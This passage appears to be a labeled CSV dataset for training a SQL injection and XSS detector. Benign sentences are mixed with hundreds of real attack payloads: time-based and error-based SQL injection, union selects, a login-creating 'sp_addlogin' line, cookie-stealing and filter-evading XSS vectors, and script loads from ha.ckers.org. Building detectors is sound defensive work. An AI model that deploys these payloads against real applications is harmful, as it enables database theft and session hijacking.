( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 1402 = 1402",2,SQLi,19760 +"<BR SIZE=""&{alert('')}"">",1,XSS,4517 +Select options wisely.,0,normal,24398 <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>,1,XSS,131 -<IMG SRC=?jav ascript:alert(?XSS?);?>,1,XSS,1669 -Select the best ingredients for the recipe.,0,normal,24300 -"1"" ) ) ) or sleep ( 5 ) #",2,SQLi,21352 -"<map draggable=""true"" ondragstart=""alert(1)"">test</map>",1,XSS,3521 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 2 ) ) AND 'i' = 'i",2,SQLi,11779 -"<BODY BACKGROUND=""javascript:alert('')"">",1,XSS,7116 -Locate items where necessary.,0,normal,23430 -"1' ) ) ) and elt ( 2506 = 2383,2383 ) and ( ( ( 'bjrj' = 'bjrj",2,SQLi,17906 -"<a href=""javas\x02cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,414 -"<dir oncontextmenu=""alert(1)"">test</dir>",1,XSS,7922 -Where's the hotel?,0,normal,23728 -Fetch data where necessary.,0,normal,23548 --9054 ) ) ) or 9323 = 9323#,2,SQLi,21449 -<section onpointerover=alert(1)>XSS</section>,1,XSS,7669 -or user like '%,2,SQLi,10064 -"<div draggable=""true"" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio>",1,XSS,2704 -"-8810' ) or make_set ( 9354 = 9354,7185 ) and ( 'prsn' like 'prsn",2,SQLi,13814 -Where's your SQL guide?,0,normal,23583 -<noframes onpointerup=alert(1)>XSS</noframes>,1,XSS,4457 -Select a class to learn something new.,0,normal,24334 -"<TABLE BACKGROUND=""javascript:alert('XSS')"">",1,XSS,274 -"1"" ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""oxxi"" = ""oxxi",2,SQLi,15912 -"exec sp_addlogin 'name' , 'password' --",2,SQLi,10089 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,10472 -"<dd draggable=""true"" ondragleave=""alert(1)"">test</dd>",1,XSS,6937 -<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;,1,XSS,1602 -"<select onclick=""alert(1)"">test</select>",1,XSS,3669 -"<small onpaste=""alert(1)"" contenteditable>test</small>",1,XSS,4798 -"<IMG STYLE="":expr/**/ession(alert(''))"">",1,XSS,8749 -"select * from users where id = 1 union select @ 1$,version ( ) -- 1",2,SQLi,11720 -"; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --",2,SQLi,11204 -"=+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+",2,SQLi,11355 -"<legend onclick=""alert(1)"">test</legend>",1,XSS,7139 -AND 7300=7300 AND ('pKlZ'='pKlZ,2,SQLi,10264 -Select a travel destination for a vacation.,0,normal,24304 -"<rt onmouseup=""alert(1)"">test</rt>",1,XSS,5504 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,21721 -<nobr onpointermove=alert(1)>XSS</nobr>,1,XSS,5961 -<textarea onpointerenter=alert(1)>XSS</textarea>,1,XSS,3733 -"RLIKE SLEEP(5) AND 1337"" LIKE ""1337",2,SQLi,11310 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 'gfln' = 'gfln",2,SQLi,18536 -Select your dream job.,0,normal,24447 -<command id=x tabindex=1 onactivate=alert(1)></command>,1,XSS,8782 -role,0,normal,23356 -"1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""fqap"" like ""fqap",2,SQLi,19364 -"<style>:target {color: red;}</style><plaintext id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></plaintext>",1,XSS,4586 -"<legend onbeforecopy=""alert(1)"" contenteditable>test</legend>",1,XSS,5100 -1' where 5547 = 5547,2,SQLi,21905 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*",2,SQLi,11021 -1'|| ( select 'bwqc' from dual where 6897 = 6897 and sleep ( 5 ) #,2,SQLi,16205 -"1 where 8389 = 8389 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,20136 -"1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'ejul' = 'ejul",2,SQLi,12290 -select ( case when ( 2352 = 8672 ) then 2352 else 2352* ( select 2352 from information_schema.character_sets ) end ) #,2,SQLi,20589 -"<body onFocus body onFocus=""javascript:javascript:alert(1)""></body onFocus>",1,XSS,354 --3431%' ) or 9323 = 9323#,2,SQLi,12857 -Where's the astrologer?,0,normal,23834 -<footer onpointerout=alert(1)>XSS</footer>,1,XSS,5755 -"<tt draggable=""true"" ondragleave=""alert(1)"">test</tt>",1,XSS,8767 -Select a new hobby to explore.,0,normal,24218 -"-9553"" ) as geih where 6453 = 6453 or 8453 = 8159--",2,SQLi,13086 -Where's the best spot to do some birdwatching?,0,normal,23870 -( select ( case when ( 6581 = 6581 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual ),2,SQLi,12900 -1%' ) and ( 3020 = 3020 ) *6703 and ( '%' = ',2,SQLi,16948 -"`'><script>\xE2\x80\xAFjavascript:alert(520)</script> -`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>",1,XSS,8957 -"1"" ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""lano"" = ""lano",2,SQLi,17930 -"1"" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,20634 -"1 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) # lgoz",2,SQLi,17345 -"1 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- dpph",2,SQLi,13228 -Insert contact.,0,normal,23252 -"1 ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( 3626 = 3626",2,SQLi,15621 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 3044 = 3044",2,SQLi,17120 -"1"" ) ) and 4595 = 4595#",2,SQLi,19141 -1' ) ) as xcvg where 1157 = 1157 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,15657 -"-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#",2,SQLi,19054 -Select milk.,0,normal,24690 -"javascript://'//"" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*",1,XSS,9571 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11130 -"1"" ) as oijn where 1521 = 1521 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,22429 -"<style>@keyframes slidein {}</style><center style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></center>",1,XSS,1699 -"<progress onbeforepaste=""alert(1)"" contenteditable>test</progress>",1,XSS,4006 --5534 or 1983 = 5721#,2,SQLi,13696 -"<nav onmousedown=""alert(1)"">test</nav>",1,XSS,3215 -"-9810' ) where 4361 = 4361 or elt ( 1032 = 1032,3623 ) --",2,SQLi,14811 -1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,12458 -Filter pool.,0,normal,23286 -"1"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( ""tzqk"" like ""tzqk",2,SQLi,20336 -"1"" ) where 2873 = 2873 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,20764 -"1"" ) as kslq where 8669 = 8669 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22250 -"<maction actiontype=""statusline"" xlink:href=""javascript:alert(3)"">CLICKME<mtext>http://http://google.com</mtext></maction>",1,XSS,9213 -"-8868"" ) where 5681 = 5681 union all select 5681,5681,5681,5681,5681,5681,5681,5681,5681,5681--",2,SQLi,13461 -"<menuitem draggable=""true"" ondragenter=""alert(1)"">test</menuitem>",1,XSS,4951 -"-3501"" ) ) ) or ( 6789 = 6990 ) *6990 and ( ( ( ""jnnc"" like ""jnnc",2,SQLi,12651 -"1"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,21206 -"or ""*",2,SQLi,9954 -"1 ) as zhvx where 3171 = 3171 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,17594 -"<center draggable=""true"" ondragstart=""alert(1)"">test</center>",1,XSS,5235 -"<multicol onbeforecut=""alert(1)"" contenteditable>test</multicol>",1,XSS,6092 -"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'sbey' = 'sbey",2,SQLi,19020 -"<caption onmouseout=""alert(1)"">test</caption>",1,XSS,6351 -"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( 'ayqn' like 'ayqn",2,SQLi,14992 -"{""id"":null,""firstName"":""Fer"",""lastName"":""Ho"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25520 -select * from users where id = 1 <@$_ or 1 = 1 -- 1,2,SQLi,11899 -"1'+ ( select 'ycsv' where 3628 = 3628 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,14764 -"-7795"" ) where 1712 = 1712 union all select 1712,1712,1712,1712#",2,SQLi,13474 -"<code onpaste=""alert(1)"" contenteditable>test</code>",1,XSS,4967 -"-4923"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""afjc"" like ""afjc",2,SQLi,22136 -<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus>,1,XSS,2067 -"1"" where 7599 = 7599",2,SQLi,17247 -<progress onpointerout=alert(1)>XSS</progress>,1,XSS,6751 -"<style>:target {color:red;}</style><frameset id=x style=""transition:color 1s"" ontransitionend=alert(1)></frameset>",1,XSS,8552 -"<bgsound onbeforecut=""alert(1)"" contenteditable>test</bgsound>",1,XSS,5628 -"-7371' ) union all select 4531,4531,4531#",2,SQLi,12322 -"<style>@keyframes x{}</style><q style=""animation-name:x"" onanimationstart=""alert(1)""></q>",1,XSS,8055 -"<strong onmouseup=""alert(1)"">test</strong>",1,XSS,3046 -"1"" ) ) rlike ( select ( case when ( 5342 = 1036 ) then 1 else 0x28 end ) ) and ( ( ""ntdz"" like ""ntdz",2,SQLi,19944 -1'+ ( select hvsb where 3666 = 3666,2,SQLi,17972 -( select ( case when ( 3348 = 1710 ) then 3348 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual ),2,SQLi,13969 -"1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""xyjg"" = ""xyjg",2,SQLi,17651 -"<IMG SRC=x ontimeupdate=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1191 -"<template onmouseup=""alert(1)"">test</template>",1,XSS,6259 -"{""id"":null,""name"":""BaoHuckmon""}",0,normal,25549 -"-3179'+ ( select 'tzzz' where 3191 = 3191 union all select 3191,3191,3191,3191,3191#",2,SQLi,13584 -"<STYLE>li {list-style-image: url(""javascript:javascript:alert(1)"");}</STYLE><UL><LI>XSS",1,XSS,712 -"<style>@keyframes x{}</style><aside style=""animation-name:x"" onanimationstart=""alert(1)""></aside>",1,XSS,7672 -<col onpointerdown=alert(1)>XSS</col>,1,XSS,8115 -"select * from users where id = 1 or 1#"". = 1 union select 1,version ( ) -- 1",2,SQLi,11996 -"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,9988 -"1"" where 7245 = 7245 and 9198 = 9198--",2,SQLi,15391 -"<script>alert(""XSS"");</script>&search=1",1,XSS,906 -"<col draggable=""true"" ondragleave=""alert(1)"">test</col>",1,XSS,6464 -I'm considering where to spend my summer vacation.,0,normal,24104 -"</stylesheet>//[""'`-->]]>]</div>",1,XSS,9013 -Index columns where necessary.,0,normal,23530 -"<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=http://;URL=javascript:alert('XSS');\"">",1,XSS,1254 -"<a href=""\x1Fjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,492 -Merge the customer databases.,0,normal,22934 -"<noscript oncut=""alert(1)"" contenteditable>test</noscript>",1,XSS,8616 -&&SLEEP(5)&&'1,2,SQLi,10434 -<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer>,1,XSS,2451 -Select your glide.,0,normal,25205 -Select a book to read during the journey.,0,normal,24274 -"<input type=""image"" dynsrc=""javascript:document.vulnerable=true;"">",1,XSS,1471 -"1"" where 9919 = 9919",2,SQLi,22387 -and sleep(5) and '1'='1,2,SQLi,11232 -I need to pick up my order from the store.,0,normal,23917 -) ) or ( ( 'x' ) ) = ( ( 'x,2,SQLi,11730 -"<summary onkeydown=""alert(1)"" contenteditable>test</summary>",1,XSS,4388 -<pre onpointerenter=alert(1)>XSS</pre>,1,XSS,5223 -"-9082 union all select 9858,9858,9858,9858,9858,9858--",2,SQLi,21542 -"<nobr onkeydown=""alert(1)"" contenteditable>test</nobr>",1,XSS,3475 -1 ) as tykp where 6851 = 6851,2,SQLi,15903 -"<menu onkeydown=""alert(1)"" contenteditable>test</menu>",1,XSS,5253 -"exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 1049 = 1049,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,18788 -"<noscript onbeforepaste=""alert(1)"" contenteditable>test</noscript>",1,XSS,8666 -<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus>,1,XSS,7511 -"<pre draggable=""true"" ondrag=""alert(1)"">test</pre>",1,XSS,7221 -"-5344"" union all select 9482,9482,9482,9482,9482,9482,9482,9482,9482--",2,SQLi,18581 -"<plaintext oncopy=""alert(1)"" contenteditable>test</plaintext>",1,XSS,2928 -"<IMG SRC=x onkeydown=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1149 -"1 ) ) as yfvg where 1454 = 1454 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,14115 -"<article onmouseleave=""alert(1)"">test</article>",1,XSS,2954 -,0,normal,23322 -<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus>,1,XSS,4075 -"1%"" ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,20502 -"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'qvoy' = 'qvoy",2,SQLi,15302 -"1 ) as auly where 4146 = 4146 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,18402 -"1"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,17463 -Where's the ballet?,0,normal,23765 -"1"" ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""wfwg"" like ""wfwg",2,SQLi,17060 -I need to decide where to go for the weekend.,0,normal,23868 -"1"" ) where 1666 = 1666 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,13725 -"select * from users where id = 1 or "",."" or 1 = 1 -- 1",2,SQLi,11512 -"1%"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""%"" = """,2,SQLi,15006 -1' and 5835 = 6157 and 'bjee' like 'bjee,2,SQLi,21881 -"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">",1,XSS,903 -Sort the color-coded files.,0,normal,22851 -"1, ( select ( case when ( 9644 = 9644 ) then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,15645 -"<div draggable=""true"" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong>",1,XSS,5021 -1' in boolean mode ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16132 -"1%"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21154 -"-7248"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ""qgms"" = ""qgms",2,SQLi,21718 -"1%"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""%"" = """,2,SQLi,21212 -1%' ) order by 1#,2,SQLi,19902 -<cite id=x tabindex=1 onfocus=alert(1)></cite>,1,XSS,7585 -"1"" ) ) as puws where 7006 = 7006",2,SQLi,13985 -select ( case when ( 3365 = 6236 ) then 3365 else 1/ ( select 0 ) end ) --,2,SQLi,13063 -"<noembed draggable=""true"" ondragend=""alert(1)"">test</noembed>",1,XSS,6931 -"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( 'clhg' = 'clhg",2,SQLi,20049 -"<button draggable=""true"" ondrag=""alert(1)"">test</button>",1,XSS,2880 -1 ) as ratg where 3033 = 3033 union all select null--,2,SQLi,15627 -"<style>:target {color:red;}</style><param id=x style=""transition:color 1s"" ontransitionend=alert(1)></param>",1,XSS,7111 -eval('\x61lert(1)'),1,XSS,9424 -<col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus>,1,XSS,5294 -"1"" ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,15118 -1 ) ) as mcyh where 1001 = 1001,2,SQLi,17945 -Select a movie for a movie marathon.,0,normal,24285 -"1"" ) where 6632 = 6632 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,13805 -<address onpointerover=alert(1)>XSS</address>,1,XSS,5991 -1'|| ( select 'uedk' where 4655 = 4655,2,SQLi,14708 -"1"" or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ""pxix"" = ""pxix",2,SQLi,12574 -"-2909'|| ( select 'qfeq' where 7062 = 7062 union all select 7062,7062,7062,7062,7062,7062--",2,SQLi,22155 -"1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'nqam' = 'nqam",2,SQLi,18520 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></tt>",1,XSS,8608 -WHERE 1=1 AND 1=0#,2,SQLi,10275 -"1"" where 3247 = 3247 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14980 -"1 ) where 5378 = 5378 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,18123 -"1%"" ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,22111 -"<kbd onmousedown=""alert(1)"">test</kbd>",1,XSS,2340 -"<xmp onmouseover=""alert(1)"">test</xmp>",1,XSS,2409 -"<content oncopy=""alert(1)"" contenteditable>test</content>",1,XSS,4316 -<;SCRIPT SRC=//ha.ckers.org/.j>;,1,XSS,1600 -^,2,SQLi,9948 -"<div id=""110""><svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,9086 -"1' where 2160 = 2160 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,20436 -"1"" where 3740 = 3740 rlike sleep ( 5 ) #",2,SQLi,18721 -"<rb onmouseenter=""alert(1)"">test</rb>",1,XSS,7626 -"{""id"":null,""firstName"":""Gin Ying"",""lastName"":""Ho"",""address"":""101 CHESAPEAKE BLVD, ELKTON MD 21921"",""city"":""345"",""telephone"":""1469948908""}",0,normal,25306 -"<script/src=data:,alert()>",1,XSS,1102 -select * from master..sysserverse,2,SQLi,10077 -"1"" where 7249 = 7249 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,21804 -<form>,1,XSS,9160 -"{""id"":null,""firstName"":""Chai"",""lastName"":""Kon Moi"",""address"":""305 W 45th St, New York NY 10036"",""city"":""957"",""telephone"":""4065619129""}",0,normal,25236 -"-3316%"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""%"" = """,2,SQLi,20298 -"1' ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,20739 -1 ) where 4866 = 4866,2,SQLi,20306 -"<main onkeypress=""alert(1)"" contenteditable>test</main>",1,XSS,2327 -1%' ) and 2949 = 4847 and ( '%' = ',2,SQLi,20478 -1 ) ) as ogcv where 4396 = 4396,2,SQLi,17436 -"<shadow draggable=""true"" ondragend=""alert(1)"">test</shadow>",1,XSS,4901 -"{""id"":null,""name"":""Charmeleon""}",0,normal,25678 -<scr<script>ipt>alert(document.cookie)</scr</script>ipt>,1,XSS,1093 -Select encourage.,0,normal,24916 -1' where 6913 = 6913 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,12369 -"1"" where 4445 = 4445 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,19749 -"-9140"" ) ) union all select 1623,1623,1623,1623,1623,1623,1623,1623,1623#",2,SQLi,13826 -"inurl:"".php?feedback­=""",1,XSS,9374 -"<style>@keyframes x{}</style><basefont style=""animation-name:x"" onanimationend=""alert(1)""></basefont>",1,XSS,5301 -"1"" ) where 2152 = 2152",2,SQLi,18958 -"-5945' ) ) ) union all select 4266,4266,4266,4266,4266--",2,SQLi,14369 -<label onpointerup=alert(1)>XSS</label>,1,XSS,6299 -"1' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 'nsji' = 'nsji",2,SQLi,13427 -<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary>,1,XSS,3172 -"<tt draggable=""true"" ondragenter=""alert(1)"">test</tt>",1,XSS,7200 -<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus>,1,XSS,3278 -"1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,20378 -"-2032%"" ) ) ) or ( 3082 = 7155 ) *7155 and ( ( ( ""%"" = """,2,SQLi,16054 -<dd onpointermove=alert(1)>XSS</dd>,1,XSS,7269 -"javascript:alert(1)//\"";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC=""javascript:alert(1);""></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//",1,XSS,9565 -<br>,1,XSS,9072 -"( select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) )",2,SQLi,15277 -1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'ulkq' = 'ulkq,2,SQLi,19650 -<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus>,1,XSS,6391 -"1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'zxrb' = 'zxrb",2,SQLi,14883 -Search records where necessary.,0,normal,23457 -"1 and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,16807 -HAVING 1=1--,2,SQLi,10249 -<figure id=x tabindex=1 onfocus=alert(1)></figure>,1,XSS,5360 -"1' ) as cgsz where 7194 = 7194 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,16058 -Where's the farmhouse?,0,normal,23748 -I'm thinking of where to have our picnic.,0,normal,24156 -<th onpointermove=alert(1)>XSS</th>,1,XSS,2387 -<video><source onerror=alert(1) src=1></video>,1,XSS,5060 -<optgroup onpointerdown=alert(1)>XSS</optgroup>,1,XSS,5167 -"<dd onclick=""alert(1)"">test</dd>",1,XSS,3754 -select ( case when ( 4291 = 6937 ) then 4291 else 4291* ( select 4291 from mysql.db ) end ) #,2,SQLi,18636 -&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;,1,XSS,1316 -Select a strategy for the game.,0,normal,24338 -<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound>,1,XSS,5863 -<element onpointerout=alert(1)>XSS</element>,1,XSS,5519 -"<style>@keyframes x{}</style><time style=""animation-name:x"" onanimationend=""alert(1)""></time>",1,XSS,3734 -"<bgsound onclick=""alert(1)"">test</bgsound>",1,XSS,2898 -"<label 